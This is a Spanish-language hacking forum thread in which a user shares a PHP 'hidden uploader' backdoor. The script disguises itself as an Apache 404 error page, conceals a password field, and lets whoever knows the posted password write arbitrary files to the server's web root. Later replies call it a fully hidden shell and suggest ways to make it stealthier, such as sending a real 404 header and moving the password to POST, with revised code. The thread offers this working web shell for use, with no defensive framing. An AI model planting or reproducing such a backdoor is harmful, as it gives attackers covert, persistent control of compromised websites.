Uploader oculto

Iniciado por Decode, Agosto 26, 2014, 09:39:18 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 26, 2014, 09:39:18 PM Ultima modificación: Julio 17, 2018, 05:31:44 PM por Decode
Hola gente,aquí les dejo un uploader oculto:

Código: php
<title>404 Not Found</title>
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
<hr> 
<address>Apache Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port 80</address> 
    <style> 
        input { margin:0;background-color:#fff;border:1px solid #fff; } 
    </style> 
    <center> 
    <form method="post"><p> 
<center><input type="password" name="pw" size="25" value=""></center> 
</form></p></center> 
<?php 
if(empty($_POST["pw"])==0){if(md5($_POST["pw"])=="76ee3de97a1b8b903319b7c013d8c877"){if(empty($_FILES["A"])==0){ 
if(move_uploaded_file($_FILES['A']['tmp_name'],$_SERVER["DOCUMENT_ROOT"].'/'.$_FILES['A']['name'])==1){echo "<center>Archivo subido!</center>";} 
}else{echo '<form enctype="multipart/form-data" action="'.$_SERVER["REQUEST_URI"].'" method="POST"><center><input name="A" type="file"><input type="submit" value="Subir"></center></form>';}exit();}} 
?>


Password: upload

Saludos.
Agosto 27, 2014, 02:47:37 PM #1
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??
Agosto 27, 2014, 03:38:13 PM #2
yo tambien uso lo mismo para mis tools en php.
Agosto 28, 2014, 04:59:09 PM #3
Buenísimo! Lo uníco que agregaría es un header() con el 404 para que cualquiera que ande con una extensión que le permita ver las headers no sospeche...
Visita mi blog: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
Agosto 30, 2014, 03:22:52 PM #4
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.

Si envías la pass por el método POST no aparecerá en la URL.
Contacto: @migueljimeno96 -
Agosto 30, 2014, 03:56:43 PM #5
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.

Si envías la pass por el método POST no aparecerá en la URL.

Para los que no saben, habría que editar las siguientes lineas por estas:

Código: php
 <form><p> 
<center><input type="password" name="pw" size="25" value=""></center> 
</form></p></center> 
<?php 
if(empty($_GET["pw"])==0){if(md5($_GET["pw"])=="202cb962ac59075b964b07152d234b70")


Por:

Código: php
 <form method="post"><p> 
<center><input type="password" name="pw" size="25" value=""></center> 
</form></p></center> 
<?php 
if(empty($_POST["pw"])==0){if(md5($_POST["pw"])=="202cb962ac59075b964b07152d234b70")


Un saludo.


Imprimir
Ir Arriba Páginas1
Acciones del Usuario